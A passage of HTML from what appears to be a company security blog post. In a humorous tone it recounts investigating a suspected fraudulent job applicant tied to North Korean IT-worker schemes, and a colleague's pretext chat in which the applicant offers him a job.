data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/df5c77c2-a197-4e73-90ee-300dff3a0188_1444x324.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:324,&quot;width&quot;:1444,&quot;resizeWidth&quot;:536,&quot;bytes&quot;:60152,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/178224681?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdf5c77c2-a197-4e73-90ee-300dff3a0188_1444x324.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!bLr8!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdf5c77c2-a197-4e73-90ee-300dff3a0188_1444x324.png 424w, https://substackcdn.com/image/fetch/$s_!bLr8!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdf5c77c2-a197-4e73-90ee-300dff3a0188_1444x324.png 848w, https://substackcdn.com/image/fetch/$s_!bLr8!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdf5c77c2-a197-4e73-90ee-300dff3a0188_1444x324.png 1272w, https://substackcdn.com/image/fetch/$s_!bLr8!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdf5c77c2-a197-4e73-90ee-300dff3a0188_1444x324.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>We also managed to <strong>back up his Klimb profile</strong>, just in case he ever wants to resume job hunting. We&#8217;re here to validate his skills or serve as a reference should the time come!</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!3Gir!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F32758afb-2d4a-44c6-8e51-f9abc620637e_2922x1730.heic" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!3Gir!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F32758afb-2d4a-44c6-8e51-f9abc620637e_2922x1730.heic 424w, https://substackcdn.com/image/fetch/$s_!3Gir!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F32758afb-2d4a-44c6-8e51-f9abc620637e_2922x1730.heic 848w, https://substackcdn.com/image/fetch/$s_!3Gir!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F32758afb-2d4a-44c6-8e51-f9abc620637e_2922x1730.heic 1272w, https://substackcdn.com/image/fetch/$s_!3Gir!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F32758afb-2d4a-44c6-8e51-f9abc620637e_2922x1730.heic 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!3Gir!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F32758afb-2d4a-44c6-8e51-f9abc620637e_2922x1730.heic" width="1456" height="862" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/32758afb-2d4a-44c6-8e51-f9abc620637e_2922x1730.heic&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:862,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:241970,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/heic&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/178224681?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F32758afb-2d4a-44c6-8e51-f9abc620637e_2922x1730.heic&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!3Gir!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F32758afb-2d4a-44c6-8e51-f9abc620637e_2922x1730.heic 424w, https://substackcdn.com/image/fetch/$s_!3Gir!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F32758afb-2d4a-44c6-8e51-f9abc620637e_2922x1730.heic 848w, https://substackcdn.com/image/fetch/$s_!3Gir!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F32758afb-2d4a-44c6-8e51-f9abc620637e_2922x1730.heic 1272w, https://substackcdn.com/image/fetch/$s_!3Gir!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F32758afb-2d4a-44c6-8e51-f9abc620637e_2922x1730.heic 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>It was a surprise to find that <strong>he claims to speak Spanish at &#8220;native level&#8221;</strong>. </p><p>I think he overstated his capabilities, but <em>who are we</em> to judge?</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!bAIn!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7297936d-1e4d-4bbf-8dc8-4d2ced8070f0_598x1402.heic" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!bAIn!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7297936d-1e4d-4bbf-8dc8-4d2ced8070f0_598x1402.heic 424w, https://substackcdn.com/image/fetch/$s_!bAIn!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7297936d-1e4d-4bbf-8dc8-4d2ced8070f0_598x1402.heic 848w, https://substackcdn.com/image/fetch/$s_!bAIn!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7297936d-1e4d-4bbf-8dc8-4d2ced8070f0_598x1402.heic 1272w, https://substackcdn.com/image/fetch/$s_!bAIn!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7297936d-1e4d-4bbf-8dc8-4d2ced8070f0_598x1402.heic 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!bAIn!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7297936d-1e4d-4bbf-8dc8-4d2ced8070f0_598x1402.heic" width="220" height="515.7859531772575" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/7297936d-1e4d-4bbf-8dc8-4d2ced8070f0_598x1402.heic&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1402,&quot;width&quot;:598,&quot;resizeWidth&quot;:220,&quot;bytes&quot;:38779,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/heic&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/178224681?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7297936d-1e4d-4bbf-8dc8-4d2ced8070f0_598x1402.heic&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!bAIn!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7297936d-1e4d-4bbf-8dc8-4d2ced8070f0_598x1402.heic 424w, https://substackcdn.com/image/fetch/$s_!bAIn!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7297936d-1e4d-4bbf-8dc8-4d2ced8070f0_598x1402.heic 848w, https://substackcdn.com/image/fetch/$s_!bAIn!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7297936d-1e4d-4bbf-8dc8-4d2ced8070f0_598x1402.heic 1272w, https://substackcdn.com/image/fetch/$s_!bAIn!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7297936d-1e4d-4bbf-8dc8-4d2ced8070f0_598x1402.heic 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Just looking around, we also found that he&#8217;s a loyal customer of <strong>AstrillVPN</strong>, which came as <strong><a href="https://gbhackers.com/north-korean-workers-linked-astrill-vpn-ip-addresses/">no surprise</a></strong>, to be honest. </p><p>We&#8217;ve also added him as a contact just in case we hear about any openings that could be a good fit.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!LQ51!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F78b850a0-21ab-45ad-b4d8-59491140a7aa_1732x1424.heic" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!LQ51!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F78b850a0-21ab-45ad-b4d8-59491140a7aa_1732x1424.heic 424w, https://substackcdn.com/image/fetch/$s_!LQ51!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F78b850a0-21ab-45ad-b4d8-59491140a7aa_1732x1424.heic 848w, https://substackcdn.com/image/fetch/$s_!LQ51!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F78b850a0-21ab-45ad-b4d8-59491140a7aa_1732x1424.heic 1272w, https://substackcdn.com/image/fetch/$s_!LQ51!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F78b850a0-21ab-45ad-b4d8-59491140a7aa_1732x1424.heic 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!LQ51!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F78b850a0-21ab-45ad-b4d8-59491140a7aa_1732x1424.heic" width="510" height="419.27884615384613" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/78b850a0-21ab-45ad-b4d8-59491140a7aa_1732x1424.heic&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1197,&quot;width&quot;:1456,&quot;resizeWidth&quot;:510,&quot;bytes&quot;:42242,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/heic&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/178224681?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F78b850a0-21ab-45ad-b4d8-59491140a7aa_1732x1424.heic&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!LQ51!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F78b850a0-21ab-45ad-b4d8-59491140a7aa_1732x1424.heic 424w, https://substackcdn.com/image/fetch/$s_!LQ51!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F78b850a0-21ab-45ad-b4d8-59491140a7aa_1732x1424.heic 848w, https://substackcdn.com/image/fetch/$s_!LQ51!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F78b850a0-21ab-45ad-b4d8-59491140a7aa_1732x1424.heic 1272w, https://substackcdn.com/image/fetch/$s_!LQ51!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F78b850a0-21ab-45ad-b4d8-59491140a7aa_1732x1424.heic 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>He looks <strong>quite different</strong> on camera. Don&#8217;t worry, that happens to some people, like engineers who work a lot&#8230; and those <strong>who abuse visual filters to look like someone else</strong>&#8230;</p><p>We wanted to let him know we had his back, so <s>we sent someone behind the enemy lines</s> <strong>a colleague messaged him</strong> &#8220;mistakenly&#8221;.</p><p>He apologised for the out of the blue message and in no time our friend Sebastian showed him that <em>fate works in mysterious ways</em>, and that sometimes dialling the <strong>wrong number</strong> could take you on a new path in life, like getting offered your <strong>dream job</strong>.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!UGjS!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff13bcdd5-977b-4785-bb86-55b4df949357_1182x1722.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!UGjS!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff13bcdd5-977b-4785-bb86-55b4df949357_1182x1722.png 424w, https://substackcdn.com/image/fetch/$s_!UGjS!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff13bcdd5-977b-4785-bb86-55b4df949357_1182x1722.png 848w, https://substackcdn.com/image/fetch/$s_!UGjS!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff13bcdd5-977b-4785-bb86-55b4df949357_1182x1722.png 1272w, https://substackcdn.com/image/fetch/$s_!UGjS!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff13bcdd5-977b-4785-bb86-55b4df949357_1182x1722.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!UGjS!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff13bcdd5-977b-4785-bb86-55b4df949357_1182x1722.png" width="433" height="630.8172588832488" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/f13bcdd5-977b-4785-bb86-55b4df949357_1182x1722.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1722,&quot;width&quot;:1182,&quot;resizeWidth&quot;:433,&quot;bytes&quot;:1183839,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/178224681?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff13bcdd5-977b-4785-bb86-55b4df949357_1182x1722.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!UGjS!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff13bcdd5-977b-4785-bb86-55b4df949357_1182x1722.png 424w, https://substackcdn.com/image/fetch/$s_!UGjS!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff13bcdd5-977b-4785-bb86-55b4df949357_1182x1722.png 848w, https://substackcdn.com/image/fetch/$s_!UGjS!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff13bcdd5-977b-4785-bb86-55b4df949357_1182x1722.png 1272w, https://substackcdn.com/image/fetch/$s_!UGjS!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff13bcdd5-977b-4785-bb86-55b4df949357_1182x1722.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>He asks a couple of routine questions and whether our colleague knows anything about <strong>software</strong> <strong>development</strong>.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!UxRE!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ac2c331-af9d-402b-8355-4a52ecf50481_1182x1726.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!UxRE!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ac2c331-af9d-402b-8355-4a52ecf50481_1182x1726.png 424w, https://substackcdn.com/image/fetch/$s_!UxRE!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ac2c331-af9d-402b-8355-4a52ecf50481_1182x1726.png 848w, https://substackcdn.com/image/fetch/$s_!UxRE!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ac2c331-af9d-402b-8355-4a52ecf50481_1182x1726.png 1272w, https://substackcdn.com/image/fetch/$s_!UxRE!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ac2c331-af9d-402b-8355-4a52ecf50481_1182x1726.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!UxRE!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ac2c331-af9d-402b-8355-4a52ecf50481_1182x1726.png" width="435" height="635.2030456852792" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/1ac2c331-af9d-402b-8355-4a52ecf50481_1182x1726.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1726,&quot;width&quot;:1182,&quot;resizeWidth&quot;:435,&quot;bytes&quot;:1280457,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/178224681?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ac2c331-af9d-402b-8355-4a52ecf50481_1182x1726.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!UxRE!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ac2c331-af9d-402b-8355-4a52ecf50481_1182x1726.png 424w, https://substackcdn.com/image/fetch/$s_!UxRE!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ac2c331-af9d-402b-8355-4a52ecf50481_1182x1726.png 848w, https://substackcdn.com/image/fetch/$s_!UxRE!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ac2c331-af9d-402b-8355-4a52ecf50481_1182x1726.png 1272w, https://substackcdn.com/image/fetch/$s_!UxRE!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ac2c331-af9d-402b-8355-4a52ecf50481_1182x1726.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 